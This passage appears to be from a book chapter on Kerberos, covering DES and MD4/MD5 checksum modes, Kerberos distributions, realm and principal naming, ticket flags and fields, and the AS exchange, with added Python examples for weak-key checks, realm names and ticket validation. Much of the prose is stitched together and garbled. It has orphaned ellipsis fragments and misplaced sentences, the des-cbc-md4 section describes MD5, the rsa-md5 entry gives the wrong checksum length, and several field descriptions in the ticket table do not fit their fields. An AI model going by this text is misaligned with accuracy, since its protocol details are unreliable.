If no encryption is in use, the encryption system is said to be a NULL encryption system. The ciphertext simply is the plaintext.

DES in CBC Mode with a CRC-32 Checksum (des-cbc-crc)
The des-cbc-crc encryption mode encrypts information under the Data Encryption Standard using the Cipher Block Chaining (CBC) mode. The details of the encryption of this data are identical to those for the des-cbc-md5 encryption mode. An attacker could use a probabilistic chosen plaintext attack to generate a valid message, even in the face of a confounder. Any time the message will pass through a hostile environment, such as the Internet, or any time the message has great value, as in financial transactions, a collision-proof checksum should be used.



DES in CBC Mode with an MD4 Checksum (des-cbc-md4)
The des-cbc-md4 encryption mode encrypts information under DES using the Cipher Block Chaining mode. The details of the encryption of this data are identical to those for the des-cbc-md5 encryption mode.

An MD5 checksum is applied to the confounder and message sequence and placed in the cksum field. As a result, the data to be encrypted must be padded to an 8-byte boundary before encryption. Unless otherwise specified, zero should be used as the initialization vector.

The DES specifications identify some weak and semi-weak keys. Because of the way that keys are derived for the encryption of checksums, keys shall not be used that yield weak or semi-weak keys when eXclusive-ORed with the constant F0F0F0F0F0F0F0F0. This consists of 56 bits of key, and 8 parity bits (one per byte). This string is then fan-folded and eXclusive-ORed with itself to form an 8-byte DES key. Next, parity is corrected on the CBC checksum. Finally, the result is returned as the key.
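The weak-key rule above as an added check (not the book's or MIT's code): the four weak and twelve semi-weak keys listed in the DES specification are tabulated, odd parity is set on each key byte, and a candidate key is rejected if the key or its F0F0F0F0F0F0F0F0 variant appears in the table. Because F0 has an even number of one bits, XORing with the constant keeps the parity of every key byte, which is the property the text credits the constant with. Sample keys passed to key_acceptable() are constructed values.

```python
# Weak and semi-weak keys from the DES specification (with odd parity already set).
DES_WEAK_KEYS = {bytes.fromhex(h) for h in (
    "0101010101010101", "FEFEFEFEFEFEFEFE",
    "E0E0E0E0F1F1F1F1", "1F1F1F1F0E0E0E0E",
)}
DES_SEMI_WEAK_KEYS = {bytes.fromhex(h) for h in (
    "011F011F010E010E", "1F011F010E010E01",
    "01E001E001F101F1", "E001E001F101F101",
    "01FE01FE01FE01FE", "FE01FE01FE01FE01",
    "1FE01FE00EF10EF1", "E01FE01FF10EF10E",
    "1FFE1FFE0EFE0EFE", "FE1FFE1FFE0EFE0E",
    "E0FEE0FEF1FEF1FE", "FEE0FEE0FEF1FEF1",
)}
CHECKSUM_VARIANT = bytes.fromhex("F0F0F0F0F0F0F0F0")


def fix_parity(key: bytes) -> bytes:
    """Set the low bit of each byte so that every byte has odd parity (DES convention)."""
    out = bytearray()
    for b in key:
        high = b & 0xFE
        ones = bin(high).count("1")
        out.append(high | (0 if ones % 2 else 1))
    return bytes(out)


def xor_variant(key: bytes, const: bytes = CHECKSUM_VARIANT) -> bytes:
    """The key variant used for checksum encryption: key XOR F0F0F0F0F0F0F0F0."""
    return bytes(a ^ b for a, b in zip(key, const))


def is_weak_or_semi_weak(key: bytes) -> bool:
    return key in DES_WEAK_KEYS or key in DES_SEMI_WEAK_KEYS


def key_acceptable(key: bytes) -> bool:
    """Kerberos rule: reject a key that is weak or semi-weak, and also one whose
    F0.. variant is, since the variant is what encrypts checksums."""
    if len(key) != 8:
        raise ValueError("DES keys are 8 bytes")
    key = fix_parity(key)
    return not (is_weak_or_semi_weak(key) or is_weak_or_semi_weak(xor_variant(key)))


if __name__ == "__main__":
    # 1010101001010101 is not itself weak, but its F0 variant is E0E0E0E0F1F1F1F1.
    print(key_acceptable(bytes.fromhex("133457799BBCDFF1")),   # True
          key_acceptable(bytes.fromhex("1010101001010101")))   # False
```

The second case is the one the rule exists for: a key that looks harmless passes the plain weak-key test but would encrypt every checksum under a weak key once the F0 variant is derived.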
• Checksum type. Indicates the algorithm used to generate the accompanying checksum.

• Checksum. Contains the checksum itself, encoded as a byte string.

All non-negative values are reserved for officially assigned type fields and interpretations. In addition, specific implementations may also support implementation-specific checksums. Selection of a specific checksum is up to the application providing the information.


A checksum is said to be collision-proof if finding two plaintexts that generate the same checksum value is infeasible. Any change to the message makes an unpredictable change to the checksum. Keyed checksums are usually cryptographically based.

To prevent message-stream modification by an active attacker, unkeyed checksums should be used only when the checksum and message will be subsequently encrypted.

Collision-proof checksums can be made tamperproof as well if the checksum value is encrypted before inclusion in a message. RSA-MD5 encrypted using DES is a new checksum algorithm of type RSA-MD5-DES.


The CRC-32 Checksum (crc32)
The CRC-32 checksum calculates a checksum based on a cyclic redundancy check as described in ISO 3309. The CRC-32 is neither keyed nor collision-proof. Use collision-proof checksums for environments in which such attacks represent a significant threat, such as the Internet, or an application with high value information.

... The algorithm takes a message of arbitrary length as input and outputs a 128-bit (16-byte) checksum.


RSA MD4 Cryptographic Checksum Using DES (rsa-md4-des)
The RSA-MD4-DES checksum calculates a keyed collision-proof checksum and requires an 8-byte confounder before the text. It uses a variant of the session key, where the variant is computed by eXclusive-ORing the key with the constant F0F0F0F0F0F0F0F0. The constant F0F0F0F0F0F0F0F0 was chosen because it maintains key parity. The resulting checksum is 24 bytes long, 8 bytes of which are redundant.

The RSA MD5 Checksum (rsa-md5)
The RSA-MD5 checksum uses the RSA MD5 algorithm to calculate a checksum. RSA-MD5 is collision-proof. ... The resulting checksum is 24 bytes long, 8 bytes of which are redundant.

DES Cipher Block Chained Checksum (des-mac)
The DES-MAC checksum is computed by prepending an 8-byte confounder to the plaintext and using the session key to perform a DES CBC-mode encryption on the result. It encrypts the same confounder and the last 8-byte block of the ciphertext using DES in Cipher Block Chaining mode and a variant of the key as described in rsa-md4-des. The resulting checksum is 128 bits (16 bytes) long, 64 bits of which are redundant.


RSA MD4 Cryptographic Checksum Using DES Alternative (rsa-md4-des-k)
The RSA-MD4-DES-K checksum calculates a keyed collision-proof checksum. The DES key is used as both key and initialization vector. This checksum is tamperproof and collision-proof. It is supported to provide backward compatibility.

The last block of the ciphertext is used as the checksum value. Any uses that do not specify an additional initialization vector will use the key as both key and initialization vector. This checksum is tamperproof and collision-proof. It is supported to provide backward compatibility.

... Most of them are based on MIT distributions in one form or another, but the lineage isn't always simple to trace. Versions 4 and 5 are based on completely different protocols.

• A program enables users to convert a version 4 format Kerberos database to a version 5 format database.

Some distributions are freely available, some are stand-alone commercial products, and others are part of a larger free or commercial system. Because version 4 is not totally compatible with version 5, organizations starting new Kerberos installations should consider starting at version 5. ... mit ... 71 ... 38). ... KRB4 (for version 4) or README ... Locations outside North America may use the Bones version.

Years ago, the designers of AFS decided to implement their own security system based on the Kerberos specification rather than using MIT Kerberos version 4, which then was not publicly available. They can, in principle, talk to each other.


DEC Ultrix Kerberos
A third distribution of Kerberos version 4 is available from Digital Equipment Corporation.

Versions of Kerberos Version 5
Version 5 of Kerberos is the most recent version.

MIT Kerberos Version 5
MIT Kerberos version 5 is freely available and is available from the same site as version 4 MIT via anonymous FTP from athena-dist.mit.edu (18 ... 0 ...).

OSF DCE Security
The Open Systems Foundation (OSF) has defined a Distributed Computing Environment (DCE) with security based on Kerberos version 5, and using the same wire protocol. Because DCE is defined as an open standard, it is up to manufacturers to provide products that fit into that standard.

Bones
Kerberos is a network security system that relies on cryptographic methods for its security. Bones is a system that provides the Kerberos API without using encryption and without providing any form of security—it's a fake that enables the use of software that expects Kerberos to be present when it cannot be. It neither has any encryption routines nor any calls to encryption routines. ... funet ... 214 ... 100) in pub/unix/security/kerberos.

SESAME
SESAME is an initiative of the European community to produce a compatible product to Kerberos version 5. SESAME makes use of DES software developed outside North America, and is not subject to export restrictions. ... esat ... ac ... html ...

TGV, Inc. ... Because Kerberos installations tend to require a considerable amount of customization, you should inspect consulting support. A good consultant who has experience installing Kerberos can greatly improve your chance of completing the project on time and within budget. The result is that products from different vendors do not always talk to each other.


DEC ULTRIX Kerberos
DEC ULTRIX contains Kerberos for a single reason, namely, to provide authenticated name service for the ULTRIX enhanced security option.

DEC's version essentially is the same as, and is derived from, MIT Kerberos version 4, except for a few changes. The most significant change is that the capability to perform any kind of end-to-end user data encryption has been eliminated to comply with export restrictions. Some other minor changes probably have been made as well.

Transarc's Kerberos
Transarc's Kerberos uses a different string-to-key function (the algorithm that turns a password into a DES key) than MIT Kerberos. A program that uses a password to acquire a ticket (for example, kinit or login) works only with one version, unless modified to try both string-to-key algorithms. MIT Kerberos uses krb.realms to map hostnames to realms and realms to Kerberos servers. This means that a program built using the MIT Kerberos libraries looks in one place for the information while a program built using the AFS Kerberos libraries looks in another.

The two versions have a different password-changing protocol, so you must use the correct "kpasswd" program for the server with which you connect.



In summary, AFS Kerberos and MIT Kerberos can interoperate after you acquire a Ticket Granting Ticket, which you can do with kinit (MIT) or klog (AFS). However, it is probably best to pick one implementation and use it exclusively.


DCE
DCE Security started from an early alpha release of version 5 and the two versions have developed independently.

The DCE Security Server, secd, listens on UDP port 88 for standard Kerberos requests and responds appropriately.

An MIT Kerberos version 5 server cannot replace the DCE Security Server. ... Second, the DCE Security model includes a Privilege Server that fills in the authorization field of a principal's ticket with DCE-specific data, and the DCE Security Server has a built-in Privilege Server.

As an additional complication, the DCE does not officially export the Kerberos version 5 API. Individual vendors can provide the Kerberos version 5 API if they want, but unless they all do (which seems unlikely) Kerberos version 5 API applications will not be compile-time portable to pure DCE environments.

Interoperability Requirements
Version 5 of the Kerberos protocol supports a myriad of options, including multiple encryption and checksum types, alternative encoding schemes, optional mechanisms for preauthentication, the handling of tickets with no addresses, options for mutual authentication, user-to-user authentication, support for proxies, forwarding, postdating and renewing tickets, formatting realm names, and handling authorization data. This minimal configuration is subject to change as technology does.



Specification 1
Specification 1 is the first definition of a standard set of these options.

Encryption and Checksum Methods
The following encryption and checksum mechanisms must be supported. ... X.500 style ...

Transited Field Encoding
DOMAIN-X500-COMPRESS must be supported.

Preauthentication Methods
The TGS-REQ method must be supported. Clients must support the PA-ENC-TIMESTAMP method, but whether it is enabled by default may be determined per realm. Servers need not support the PA-ENC-TIMESTAMP method, but if not supported, the server should ignore the presence of PA-ENC-TIMESTAMP preauthentication in a request.


Ticket Addresses and Flags
All Key Distribution Centers must pass on tickets that carry no addresses. Each realm may set its own policy for issuing such tickets, and each application server sets its own policy concerning accepting them.

Proxies and forwarded tickets must be supported.

All implementations must recognize renewable and postdated tickets, but need not actually implement them. When a server decodes a postdated ticket, all implementations make the presence of the postdated flag visible to the calling server. Individual realms can decide as a matter of policy to reject such requests on a per-principal or realm-wide basis. Passing on a subfield is never correct, and no registered subfield types presently specify suppression at the Key Distribution Center. Implementations are not required to permit clients to specify the contents of the authorization data fields. Each type of name has its own rules, structure, and limitations.

To enforce these conventions, each realm must conform to the conventions.

Presently, the four styles of realm names are domain, X.500, other, and reserved. Examples of each style follow:

    domain:     host.domain
    X500:       C=US/O=OSF
    other:      NAMETYPE:rest/of...
    reserved:   ...

Domain names must look like Internet domain names ... and contain neither colons (:) nor slashes (/). ... X.500 names to remain consistent with other naming conventions in use within the organization. X.500 names contain an equal sign (=) and cannot contain a colon (:) before the equal sign. X.500 names are string representations of the names with components separated by slashes (leading and trailing slashes not included). Names that fall into the other category must begin with a prefix that contains no equal sign (=) or period (.) ... All prefixes must be assigned before they may be used.

Finally, a category of names is left for future use. All names in this category are reserved.

These rules guarantee no conflicts between the various name styles. ... X.500 categories. ... X.500 formats must be used by organizations that own an Internet domain name or X.500 name. If no such names are registered, authority to use a realm name may be derived from the authority of the parent realm. ... MIT.EDU realm can authorize the creation of a realm of that name. ... X.500 and domain name systems as well. ... X.500 hierarchy, the parent is responsible for ensuring that a name identical to the realm name of the child does not exist in the future unless assigned to the child.
The name-type field that is part of the principal name indicates the kind of information implied by the name. Ignoring the name type, no two names can be the same. An example of a principal name is a username of JSmith ... ABC ... The following name types are defined:

    Name Type       Value   Meaning
    NT-UNKNOWN      0       Name type not known
    NT-PRINCIPAL    1       Just the name of the principal as in DCE, or for users
    NT-SRV-INST     2       Service and other unique instance (krbtgt)
    NT-SRV-HST      3       Service with host name as instance (telnet, rcommands)
    NT-SRV-XHST     4       Service with host as remaining components
    NT-UID          5       Unique ID

When a name implies no information other than its uniqueness at a particular time, the name type PRINCIPAL should be used. If the name is a unique machine-generated ID guaranteed never to be reassigned, then the name type of UID should be used.

Reassigned names could acquire rights to information that were not intended.

If the first component of a name identifies a service and the remaining components identify an instance of the service in a server-specified manner, then the name type of SRV-INST should be used.



If an instance is a single component following the service name and the instance identifies the host on which the server is running, then the name type SRV-HST should be used. If the separate components of the host name appear as successive components following the name of the service, then the name type SRV-XHST should be used. ... X.500 names where the slash (/) might otherwise be ambiguous. When comparing names, a name type of UNKNOWN matches principals authenticated with names of any type.

Name of Server Principals
The principal identifier for a server on a host generally is composed of the following two parts:

• The realm of the Key Distribution Center with which the server is registered

• A two-component name of type NT-SRV-HST if the host name is an Internet domain name, or a multicomponent name of type NT-SRV-XHST if the name of the host is of a form that permits slash (/) separators, such as X.500 ... Where the name of the host is not case-sensitive (for example, with Internet domain names), the name of the host must be lowercase.
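The realm-name styles, the name-type comparison rule, and the server-principal rules from the preceding sections, combined in one added example (not code from the book): realm_style() classifies a realm name as domain, X500, other, or reserved by applying the tests in the order the text gives them; server_principal() builds a two-component NT-SRV-HST name with a lowercased DNS host, or a multi-component NT-SRV-XHST name for a slash-separated host; names_match() treats NT-UNKNOWN as matching any name type. The dictionary representation and the sample names are assumptions.

```python
def realm_style(name: str) -> str:
    """Classify a realm name: domain, X500, other, or reserved.

    domain:   components separated by periods, no colon and no slash
    X500:     contains an equal sign with no colon before it
    other:    a prefix with no equal sign or period, then a colon, then the rest
    reserved: everything else"""
    if ":" not in name and "/" not in name and "." in name \
            and all(part for part in name.split(".")):
        return "domain"
    if "=" in name and ":" not in name.split("=", 1)[0]:
        return "X500"
    prefix, sep, _rest = name.partition(":")
    if sep and prefix and "=" not in prefix and "." not in prefix:
        return "other"
    return "reserved"


def server_principal(service: str, host: str, realm: str) -> dict:
    """Principal identifier for a server on a host (assumed dictionary layout).

    A DNS host name gives a two-component NT-SRV-HST name with the host in
    lowercase, since DNS names are not case-sensitive. A slash-separated host
    name (X.500 style) gives a multi-component NT-SRV-XHST name."""
    if "/" in host:
        components = [service] + [c for c in host.strip("/").split("/") if c]
        name_type = "NT-SRV-XHST"
    else:
        components = [service, host.lower()]
        name_type = "NT-SRV-HST"
    return {"realm": realm, "name_type": name_type, "components": components}


def names_match(a: dict, b: dict) -> bool:
    """Two principal names match when their realm and components are identical
    and their name types agree; NT-UNKNOWN on either side matches any type."""
    if a["realm"] != b["realm"] or a["components"] != b["components"]:
        return False
    return ("NT-UNKNOWN" in (a["name_type"], b["name_type"])
            or a["name_type"] == b["name_type"])


if __name__ == "__main__":
    for sample in ("ABC.COM", "C=US/O=OSF", "NAMETYPE:rest/of.name", "???"):
        print(sample, "->", realm_style(sample))
    print(server_principal("telnet", "Host.ABC.COM", "ABC.COM"))
```

The domain test deliberately refuses empty components (a leading, trailing, or doubled period), so a malformed name falls through to reserved instead of being accepted as a domain-style realm.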


Cross-Realm Operation
The Kerberos protocol is designed to operate across organizational boundaries. Each organization that wants to run a Kerberos server establishes its own realm.

By establishing inter-realm keys, the administrators of two realms can enable a client authenticated in the local realm to use its authentication remotely. For even small numbers of clients, however, this becomes cumbersome, and more automatic methods are necessary. A client then can obtain a Ticket Granting Ticket for the remote realm’s Ticket Granting Service from its local realm. It thereby can be certain that it was issued by the client’s own Ticket Granting Server.

A realm is said to communicate with another realm if the two realms share an inter-realm key or if the local realm shares an inter-realm key with an intermediate realm that communicates with the remote realm.

Realms typically are organized hierarchically. If an inter-realm key is not directly shared by two realms, the hierarchical organization permits an authentication path to be constructed. If there is regular communication between two realms that are not directly connected in the hierarchy, they can set up a direct key between the two realms. Figure 9.3 shows a corporate hierarchy with the links between systems representing a connection with a shared key. ... RESEARCH ... COM and ProjectW ... ABC ... Any time a connection will see significant data flows, an inter-realm key can be created and shared between the servers.
[Figure 9.3: corporate realm hierarchy. Realms shown: ABC.COM, Production, ProjectW, Research, ProjectX, Accounting, Payroll, ProjectW, ProjectX. Each link between realms represents a shared inter-realm key.]

Although realms typically are hierarchical, intermediate realms can be bypassed to achieve cross-realm authentication through alternative authentication paths. The end-service needs to know which realms were transited when deciding how much faith to place in the authentication process.


Ticket Flags
Each Kerberos ticket contains a set of bit flags that are used to indicate attributes of that ticket. Some are turned on and off automatically by a Kerberos server as required. Table 9.1 lists the ticket flags.

Table 9.1 Ticket Flags
Bit(s)  Name          Description
1       FORWARDABLE   This flag tells the Ticket Granting Server that it is OK to issue a new Ticket Granting Ticket with a different network address based on the presented ticket.
3       PROXIABLE     The PROXIABLE flag has an interpretation identical to that of the FORWARDABLE flag, except that the PROXIABLE flag tells the Ticket Granting Server that only non-Ticket Granting Tickets may be issued with different network addresses.
5       MAY-POSTDATE  This flag tells the Ticket Granting Server that a postdated ticket may be issued based on this Ticket Granting Ticket.
7       INVALID       This flag indicates that a ticket must be validated before use.
9       INITIAL       This flag indicates that this ticket was issued using the Authentication Server protocol, and not issued based on a Ticket Granting Ticket.
11      HW-AUTHENT    This flag indicates that the protocol employed for initial authentication required the use of hardware expected to be possessed solely by the named client.
Initial and Preauthenticated Tickets
The INITIAL flag indicates that a ticket was issued using the Authentication Server protocol and not issued based on a Ticket Granting Ticket. Application servers that require it are thus assured that the client’s key was recently presented to the application client. Application servers must reject tickets that have the INVALID flag set. Invalid tickets must be validated by the Key Distribution Center before use, by presenting them to the Key Distribution Center in a Ticket Granting Server request with the VALIDATE option specified. The validation is required so that postdated tickets that have been stolen before their start time can be rendered permanently invalid using a hot-list mechanism.

Holding tickets that are valid for long periods, however, exposes the credentials to potential theft for equally long periods, and those stolen credentials would be valid until the expiration time of the ticket(s). The solution to this problem is a renewable ticket. Renewable tickets have two expiration times. An application client must present a renewable ticket to the Key Distribution Center before it expires. The Key Distribution Center issues a new ticket with a new session key and a later expiration time. When the latest permissible expiration time arrives, the ticket expires permanently. If a renewable ticket is reported stolen, the Key Distribution Center refuses to renew it, thereby reducing the usable lifetime of stolen tickets. Application servers usually can ignore the RENEWABLE flag.

If a renewable ticket is not renewed by its expiration time, the Key Distribution Center will not renew the ticket. If the RENEWABLE flag is set, then the renew-till field in the ticket contains the time after which the ticket may not be renewed. Consider, for example, a long-running simulation. Because the application will run for longer than the local policy allows a single ticket to live, the application will request a renewable ticket. Each renewal verifies that the workstation controlling the simulation has not been listed as compromised.

A batch submission system, for example, would need tickets to be valid at the time the batch job is serviced. Postdated tickets provide a way to obtain these tickets from the Key Distribution Center at job submission time, but to leave them dormant until they are activated and validated by a further request of the Key Distribution Center.

The MAY-POSTDATE flag in a ticket normally is interpreted only by the Ticket Granting Service. This flag must be set in a Ticket Granting Ticket in order to issue a postdated ticket based on the presented ticket. A client can request it by setting the ALLOW-POSTDATE option in the KRB_AS_REQ message. Postdated Ticket Granting Tickets can be obtained only by requesting the postdating in the KRB_AS_REQ message. The Key Distribution Center can limit how far in the future a ticket may be postdated. The application server can check the authtime field in the ticket to see when the original authentication occurred. When the Key Distribution Center issues a POSTDATED ticket, it also is marked as INVALID, so that the application client must present the ticket to the Key Distribution Center to be validated before use.

It is sometimes necessary for a principal to allow a service to perform an operation on its behalf. The service must be able to take on the identity of the client, but only for a particular purpose.

The PROXIABLE flag in a ticket normally is interpreted only by the Ticket Granting Service. When set, this flag gives the Ticket Granting Server the go-ahead to issue a new ticket (but not a Ticket Granting Ticket) with a different network address based on this ticket. This flag enables a client to pass a proxy to a server to perform a remote request on its behalf.

To complicate the use of stolen credentials, Kerberos tickets usually are valid only from those network addresses specifically included in the ticket. Therefore, a client that wants to grant a proxy must request a new ticket valid for the network address of the service to be granted the proxy.

Application servers may check the PROXY flag and require additional authentication from the agent before presenting the proxy in order to provide an audit trail.

A user might log in to a remote system, for example, and want authentication to work from that system as if the login were local. Application servers can ignore the FORWARDABLE flag. This flag is reset by default, but users can request that it be set by setting the FORWARDABLE option in the Authentication Server request when they request the initial Ticket Granting Ticket. If the flag is not set, then authentication forwarding is not permitted.

The FORWARDED flag is set by the Ticket Granting Server when a client presents a ticket with the FORWARDABLE flag set and requests it be set by specifying the FORWARDED Key Distribution Center option and supplying a set of addresses for the new ticket. Application servers might want to process FORWARDED tickets differently from non-FORWARDED tickets.

INITIAL, PREAUTHENT, and HW-AUTHENT are set at the time of authentication. The INITIAL flag does not carry forward onto future tickets, so it serves to indicate that this ticket was authenticated directly, which is useful for applications that require a specific authentication prior to proceeding, such as the login or password changing programs. These tickets should be usable only by the legitimate user.

Finally, the flag HW-AUTHENT indicates that the user was hardware authenticated. Applications dealing with particularly sensitive information or large financial transactions might want to insist on a hardware authentication.

The RENEWABLE-OK option indicates that the client will accept a renewable ticket if a ticket with the requested life cannot otherwise be provided. The value of the renew-till field still can be adjusted by site-determined limits or limits imposed by the individual principal or server. The ENC-TKT-IN-SKEY option indicates that the to-be-issued ticket for the end server is to be encrypted in the session key from the additional Ticket Granting Ticket provided with the request.

The following sections describe the interactions between network clients and servers and the messages involved in those exchanges.

When a ticket or authenticator is included in a protocol message, it is treated as an opaque object. A ticket contains the following information:

Ticket = {
    tkt-vno[0]              INTEGER,
    realm[1]                Realm,
    sname[2]                PrincipalName,
    enc-part[3]             EncryptedData
}
-- Encrypted part of ticket
EncryptedData = {
    flags[0]                TicketFlags,
    key[1]                  EncryptionKey,
    crealm[2]               Realm,
    cname[3]                PrincipalName,
    transited[4]            TransitedEncoding,
    authtime[5]             KerberosTime,
    starttime[6]            KerberosTime OPTIONAL,
    endtime[7]              KerberosTime,
    renew-till[8]           KerberosTime OPTIONAL,
    caddr[9]                HostAddresses OPTIONAL,
    authorization-data[10]  AuthorizationData OPTIONAL
}
-- encoded Transited field
TransitedEncoding = {
    tr-type[0]              INTEGER,  -- must be registered
    contents[1]             BYTE STRING
}


The encoding of EncryptedData is encrypted in the key shared by Kerberos and the end server (the server’s secret key). Table 9.2 describes the fields in the ticket.

Table 9.2 Ticket Field Descriptions
Field               Description
tkt-vno             Specifies the version number of the ticket.
realm               Serves to identify the realm part of the server’s principal identifier.
sname               Specifies the name part of the server’s identity.
flags               Indicates which of various options were used or requested when the ticket was issued.
crealm              Contains the name of the realm in which the client is registered and in which initial authentication took place.
transited           Lists the names of the Kerberos realms that took part in authenticating the user to whom this ticket was issued.
authtime            Serves as the time of issue for the original ticket on which this ticket is based.
starttime           Specifies the time after which the ticket is valid. If absent from the ticket, its value should be treated as that of the authtime field.
endtime             Individual services can place their own limits on the life of a ticket and reject tickets that have not yet expired.
renew-till          Indicates the maximum endtime that can be included in a renewal. Can be thought of as the absolute expiration time for the ticket, including all renewals.
caddr               If no addresses, the ticket can be used from any location. Administrators can refuse to issue or accept such tickets. Because the session key is not sent over the network in cleartext, credentials can’t be stolen simply by listening to the network.
authorization-data  Serves to pass authorization data from the principal on whose behalf a ticket was issued to the application service. If no authorization data is included, it is left out. A client who wants to print a file, for example, can obtain a file server proxy to be passed to the print server. The authorization-data field is optional and does not have to be included in a ticket.
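The flag bits of Table 9.1 and the acceptance rules an application server applies to a decrypted ticket (reject INVALID, starttime defaulting to authtime, the endtime and the service’s own life limit, the caddr restriction, optional insistence on INITIAL or HW-AUTHENT), as an added example in Python that is not code from the chapter. The bit positions of the flags the table omits (FORWARDED, PROXY, POSTDATED, RENEWABLE, PRE-AUTHENT) follow RFC 1510; the clock, addresses and sample tickets are constructed.

```python
"""Added example (not from the chapter): decoding Kerberos ticket flags and an
application server's acceptance checks on a ticket it has already decrypted."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Optional

# Ticket flag bit positions. Bits 1, 3, 5, 7, 9 and 11 are from Table 9.1;
# the even positions are the remaining flags as numbered in RFC 1510.
TICKET_FLAG_BITS = {
    "FORWARDABLE": 1, "FORWARDED": 2, "PROXIABLE": 3, "PROXY": 4,
    "MAY-POSTDATE": 5, "POSTDATED": 6, "INVALID": 7, "RENEWABLE": 8,
    "INITIAL": 9, "PRE-AUTHENT": 10, "HW-AUTHENT": 11,
}

def decode_ticket_flags(raw: bytes) -> set:
    """Decode the 32-bit TicketFlags bit string. Bit 0 is the most significant
    bit of the first byte (ASN.1 BIT STRING order), so bit n sits at 31 - n."""
    if len(raw) != 4:
        raise ValueError("TicketFlags is a 32-bit bit string")
    value = int.from_bytes(raw, "big")
    return {name for name, bit in TICKET_FLAG_BITS.items() if value >> (31 - bit) & 1}

def encode_ticket_flags(names) -> bytes:
    """Inverse of decode_ticket_flags; used to build the constructed sample tickets."""
    value = 0
    for name in names:
        value |= 1 << (31 - TICKET_FLAG_BITS[name])
    return value.to_bytes(4, "big")

@dataclass
class DecryptedTicket:
    """Fields of the ticket's encrypted part that the checks below need."""
    flags: bytes
    authtime: datetime
    endtime: datetime
    starttime: Optional[datetime] = None        # absent: treated as authtime
    caddr: list = field(default_factory=list)   # empty: usable from any address

@dataclass
class ServicePolicy:
    """Local decisions the chapter leaves to each application server."""
    require_initial: bool = False            # e.g. login or password-changing programs
    require_hw_authent: bool = False         # e.g. large financial transactions
    reject_forwarded_or_proxy: bool = False
    max_life_hours: Optional[float] = None   # the service's own limit on ticket life
    allow_addressless: bool = True

def check_ticket(tkt: DecryptedTicket, policy: ServicePolicy, now: datetime,
                 client_addr: str) -> str:
    """Return "OK" or the reason the ticket is refused."""
    flags = decode_ticket_flags(tkt.flags)
    # INVALID tickets must first be validated by the KDC; servers must reject them.
    if "INVALID" in flags:
        return "ticket not yet validated"
    start = tkt.starttime or tkt.authtime
    if now < start:
        return "ticket not yet valid"
    if now >= tkt.endtime:
        return "ticket expired"
    # Services may place their own limit on ticket life and reject unexpired tickets.
    if (policy.max_life_hours is not None
            and tkt.endtime - tkt.authtime > timedelta(hours=policy.max_life_hours)):
        return "ticket life exceeds service limit"
    # Tickets are usually valid only from the addresses included in them.
    if tkt.caddr:
        if client_addr not in tkt.caddr:
            return "client address not in ticket"
    elif not policy.allow_addressless:
        return "addressless tickets refused"
    if policy.require_initial and "INITIAL" not in flags:
        return "initial authentication required"
    if policy.require_hw_authent and "HW-AUTHENT" not in flags:
        return "hardware authentication required"
    if policy.reject_forwarded_or_proxy and flags & {"FORWARDED", "PROXY"}:
        return "forwarded or proxy tickets refused"
    return "OK"

# Constructed server clock and sample tickets for trying the checks out.
NOW = datetime(1996, 2, 2, 12, 0, tzinfo=timezone.utc)

def sample_ticket(flag_names, life_hours=8, start_in_hours=None, caddr=()):
    """A constructed ticket whose original authentication was one hour before NOW."""
    authtime = NOW - timedelta(hours=1)
    start = None if start_in_hours is None else NOW + timedelta(hours=start_in_hours)
    return DecryptedTicket(encode_ticket_flags(flag_names), authtime,
                           authtime + timedelta(hours=life_hours), start, list(caddr))

if __name__ == "__main__":
    t = sample_ticket({"FORWARDABLE", "INITIAL"}, caddr=["10.0.0.5"])
    print(sorted(decode_ticket_flags(t.flags)), check_ticket(t, ServicePolicy(), NOW, "10.0.0.5"))
```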
The encoding of the authenticator is encrypted in the ticket’s session key shared by the client and the server. Table 9.3 describes the fields in the authenticator.

Table 9.3 Authenticator Field Descriptions
Field                  Description
authenticator-vno      Specifies the version number for the format of the authenticator.
cksum                  Contains a checksum of the application data that accompanies the KRB_AP_REQ.
cusec                  Often appears along with ctime, because the two fields are used together to specify a reasonably accurate timestamp.
subkey                 Contains the client’s choice for an encryption key to be used to protect this specific application session.
seq-number (optional)  Includes the initial sequence number to be used by the KRB_PRIV or KRB_SAFE messages when sequence numbers are used to detect replays. When included in the authenticator, this field specifies the initial sequence number for messages from the client to the server. Incremented by one after each message is sent when used in KRB_PRIV or KRB_SAFE messages. The initial sequence number should be random and uniformly distributed across the full space of possible sequence numbers, so an attacker cannot guess it and successive sequence numbers do not repeat other sequences.
authorization-data     Optional, and appears only when additional restrictions are placed on the use of a ticket.
In the Authentication Server exchange, the client’s secret key is used for encryption and decryption. This exchange also is used to request credentials for services that must not be mediated through the Ticket Granting Service, but rather require a principal’s secret key, such as the password-changing service. Otherwise, it would be possible for someone to walk up to an unattended session and change another user’s password.

To authenticate a user logging on to a local system, the credentials obtained in the Authentication Server exchange can first be used in a Ticket Granting Server exchange to obtain credentials for a local server.

Note: The exchange consists of two messages: KRB_AS_REQ from the client to Kerberos, and KRB_AS_REP or KRB_ERROR in reply. The response, KRB_AS_REP, contains a ticket for the client to present to the server, and a session key to be shared by the client and the server.

The KRB_AS_REP message contains information that can be used to detect replays and associate it with the message to which it replies. The error message, KRB_ERROR, is not encrypted. The lack of encryption in the KRB_ERROR message precludes the capability to detect replays or fabrications of such messages. The Key Distribution Center simply sends a reply without knowing or caring whether they are the same, which is acceptable because nobody but the principal whose identity was given in the request can use the reply. The initial request supports an optional field that can be used to pass additional information that might be needed for the initial exchange.


Generation of KRB_AS_REQ Message
The client can specify a number of options in the initial request.


Receipt of a KRB_AS_REQ Message
If all goes well, processing the KRB_AS_REQ message results in the creation of a ticket for the client to present to the server. If required, the server preauthenticates the request, and if the preauthentication check fails, an error message with the code KDC_ERR_PREAUTH_FAILED is returned. Otherwise, it generates a random session key. Such randomness can only be achieved in a pseudo-random number generator if it is based on cryptographic principles.

If the requested start time is absent or indicates a time in the past, then the start time of the ticket is set to the authentication server’s current time. The administrator might decide to prohibit certain types or ranges of postdated tickets. The postdated ticket must be validated before use by presenting it to the Key Distribution Center after the start time has been reached. If the requested expiration time for the ticket exceeds what was determined as earlier, and if the RENEWABLE-OK option was requested, then the RENEWABLE flag is set in the new ticket, and the renew-till value is set as if the RENEWABLE option were requested. If the new ticket is postdated (the start time is in the future), its INVALID flag also will be set. The Key Distribution Center copies the addresses in the request into the caddr of the response, placing any required preauthentication data into the padata of the response.


Receipt of a KRB_AS_REP Message
